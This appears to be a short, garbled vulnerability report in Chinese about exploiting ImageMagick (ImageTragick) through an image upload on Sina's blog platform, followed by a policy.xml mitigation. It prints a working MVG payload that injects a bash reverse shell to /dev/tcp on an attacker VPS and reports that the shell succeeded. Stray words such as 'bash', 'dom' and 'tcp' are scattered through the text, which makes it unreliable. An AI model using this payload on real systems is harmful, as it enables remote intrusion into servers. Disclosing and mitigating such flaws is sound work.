Vulnerability exploit method are as follows:shell
新浪博客发图片的地方
bash
选择图片
图片内容为
dom
code 区域tcp
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")' pop graphic-context
一步一步点到保存成功
url
开始上传
code
shell躺在了vps上
xml
修复建议:vps
使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加以下代码:图片
<policymap>
<policy domain=”coder” rights=”none” pattern=”EPHEMERAL” />
<policy domain=”coder” rights=”none” pattern=”URL” />
<policy domain=”coder” rights=”none” pattern=”HTTPS” />
<policy domain=”coder” rights=”none” pattern=”MVG” />
<policy domain=”coder” rights=”none” pattern=”MSL” />
</policymap>get